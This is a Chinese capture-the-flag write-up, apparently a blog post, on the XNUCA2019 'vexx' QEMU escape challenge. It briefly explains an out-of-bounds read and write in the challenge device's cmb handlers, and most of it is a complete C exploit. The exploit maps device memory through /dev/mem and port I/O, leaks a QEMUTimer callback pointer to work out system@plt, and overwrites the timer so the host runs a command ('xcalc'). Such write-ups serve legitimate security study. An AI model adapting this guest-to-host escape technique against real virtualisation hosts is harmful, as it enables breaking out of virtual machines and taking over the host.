• [qemu逃逸] XNUCA2019-vexx

    前言

    这题没有去符合, 题目本身不算难.

    用户名: root

    密码: goodluck

    设备逆向

    题目没有去符合, 所以其实没啥好讲了, 就列一些笔者认为关键的地方

    这里的定义了两块 mmio 内存区. 然后看下设备实例结构体:

    可以看到 QEMUTimer, 所以多半就是劫持 dma_timer 了.

    漏洞点在 cmb_read/cmb_write 中: 这里仅仅分析 vexx_cmb_write

    在实例结构体中 req_buf 的大小为 0x100, 而 addr = offset + addr, 这里只检查了之前的 addr <= 0x100, 但是没有检查 offset+addr 是否越界, 而在 vexx_ioport_write 中是可以控制 offset 的, 从而导致越界写.

     同理 vexx_cmb_read 存在越界读

    漏洞利用

    其实就很简单了直接劫持 QEMUTimer 就行了

    exp 如下: 注: 经过测试 pmio 一次只能写一个字节

    1. #include 
    2. #include 
    3. #include 
    4. #include 
    5. #include 
    6. #include 
    7. #include 
    8.  
    9. uint64_t mmio_addr = 0x00000000febd6000;
    10. uint64_t mmio_size = 0x1000;
    11. uint64_t cmb_addr  = 0x00000000febd0000;
    12. uint64_t cmb_size  = 0x4000;
    13.  
    14. void * mmio_base;
    15. void * cmb_base;
    16. uint64_t pmio_base = 0x230;
    17.  
    18. void mmio_init()
    19. {
    20.         int fd = open("/dev/mem", 2);
    21.         mmio_base = mmap(0, mmio_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmio_addr);
    22.         if (mmio_base < 0) puts("[X} mmio_init at mmio"), exit(EXIT_FAILURE);
    23.         if (mlock(mmio_base, mmio_size) < 0) puts("[X] mlock at mmio"), exit(EXIT_FAILURE);
    24.         cmb_base  = mmap(0, cmb_size , PROT_READ|PROT_WRITE, MAP_SHARED, fd, cmb_addr );
    25.         if (cmb_base < 0)  puts("[X] mmio_init at cmb"), exit(EXIT_FAILURE);
    26.         if (mlock(cmb_base, cmb_size) < 0) puts("[X] mlock at cmb"), exit(EXIT_FAILURE);
    27.         printf("[+] mmio_base: %#p\n", mmio_base);
    28.         printf("[+] cmb_base: %#p\n", cmb_base);
    29. }
    30.  
    31. uint32_t mmio_read(uint64_t offset)
    32. {
    33.         return *(uint32_t*)(mmio_base + offset);
    34. }
    35.  
    36. void mmio_write(uint64_t offset, uint64_t val)
    37. {
    38.         *(uint64_t*)(mmio_base + offset) = val;
    39. }
    40.  
    41. uint32_t cmb_read(uint64_t offset)
    42. {
    43.         return *(uint32_t*)(cmb_base + offset);
    44. }
    45.  
    46. void cmb_write(uint64_t offset, uint32_t val)
    47. {
    48.         *(uint32_t*)(cmb_base + offset) = val;
    49. }
    50.  
    51. void pmio_init()
    52. {
    53.         if (iopl(3) < 0) puts("[X] pmio_init"), exit(EXIT_FAILURE);
    54. }
    55.  
    56. uint32_t pmio_read(uint32_t addr)
    57. {
    58.         return inl(pmio_base + (addr - 0x230));
    59. }
    60.  
    61. void pmio_writel(uint32_t addr, uint32_t val)
    62. {
    63.         outl(val, pmio_base + (addr - 0x230));
    64. }
    65.  
    66. void pmio_writew(uint32_t addr, uint32_t val)
    67. {
    68.         outw(val, pmio_base + (addr - 0x230));
    69. }
    70.  
    71. void pmio_writeb(uint32_t addr, uint32_t val)
    72. {
    73.         outb(val, pmio_base + (addr - 0x230));
    74. }
    75.  
    76. int main(int argc, char** argv, char** envp)
    77. {
    78.         mmio_init();
    79.         pmio_init();
    80.         /*
    81.         puts("[+] outl");
    82.         pmio_writel(0x240, 0x38);
    83.         puts("[+] outw");
    84.         pmio_writew(0x240, 0x38);
    85.         */
    86.         puts("[+] outb");
    87.         pmio_writeb(0x240, 0x38);
    88.         pmio_writeb(0x230, 1);
    89.         uint64_t cb_addr = cmb_read(0x100);
    90.         printf("[+] cb_addr: %#llx\n", cb_addr);
    91.         pmio_writeb(0x240, 0x3c);
    92.         pmio_writeb(0x230, 1);
    93.         cb_addr = cb_addr | ((1ULL * cmb_read(0x100)) << 32);
    94.         uint64_t system_plt = cb_addr - 0x00000000004DCF10 + 0x00000000002AB860;
    95.         printf("[+] cb_addr: %#llx\n", cb_addr);
    96.         printf("[+] system@plt: %#llx\n", system_plt);
    97.  
    98.         pmio_writeb(0x240, 0x40);
    99.         pmio_writeb(0x230, 1);
    100.         uint64_t arg_addr = cmb_read(0x100);
    101.         printf("[+] arg_addr: %#llx\n", arg_addr);
    102.         pmio_writeb(0x240, 0x44);
    103.         pmio_writeb(0x230, 1);
    104.         arg_addr = arg_addr | ((1ULL * cmb_read(0x100)) << 32);
    105.         uint64_t cmd_addr = arg_addr + 0xb90;
    106.         printf("[+] arg_addr: %#llx\n", arg_addr);
    107.         printf("[+] cmd_addr: %#llx\n", cmd_addr);
    108.  
    109.         pmio_writeb(0x240, 0x38);
    110.         pmio_writeb(0x230, 1);
    111.         cmb_write(0x100, system_plt&0xffffffff);
    112.         pmio_writeb(0x240, 0x3c);
    113.         pmio_writeb(0x230, 1);
    114.         cmb_write(0x100, (system_plt>>32)&0xffffffff);
    115.  
    116.         pmio_writeb(0x240, 0x40);
    117.         pmio_writeb(0x230, 1);
    118.         cmb_write(0x100, cmd_addr&0xffffffff);
    119.         pmio_writeb(0x240, 0x44);
    120.         pmio_writeb(0x230, 1);
    121.         cmb_write(0x100, (cmd_addr>>32)&0xffffffff);
    122.  
    123.         char cmd[8] = "xcalc";
    124.         pmio_writeb(0x240, 0);
    125.         pmio_writeb(0x230, 1);
    126.         cmb_write(0, *(uint32_t*)&cmd[0]);
    127.         pmio_writeb(0x240, 4);
    128.         pmio_writeb(0x230, 1);
    129.         cmb_write(0, *(uint32_t*)&cmd[4]);
    130.  
    131.         mmio_write(0x98, 1);
    132.  
    133. //      puts("[-] DEBUG");
    134. //      pmio_writeb(0x240, 0x38);
    135.  
    136.  
    137.         return 0;
    138. }
    139. x

     效果如下:

  • 相关阅读:
    蓝桥杯 危险系数 图算法
    [谷粒商城笔记]07、Linux环境-虚拟机网络设置
    日语等级J.TEST的自测卷
    算法通关村17关 | 盘点面试大热门之区间问题
    零零信安-D&D数据泄露报警日报【第37期】
    Llama 3-V: 比GPT4-V小100倍的SOTA
    30岁年薪28W,我还是没顶住压力跳槽了····
    MySQL总结练习题
    K8S安装过程十:Kubernetes CNI插件与CoreDNS服务部署
    大龄转行当程序员:只能选择小众技术,避免与年轻人竞争?
  • 原文地址:https://blog.csdn.net/qq_61670993/article/details/134490386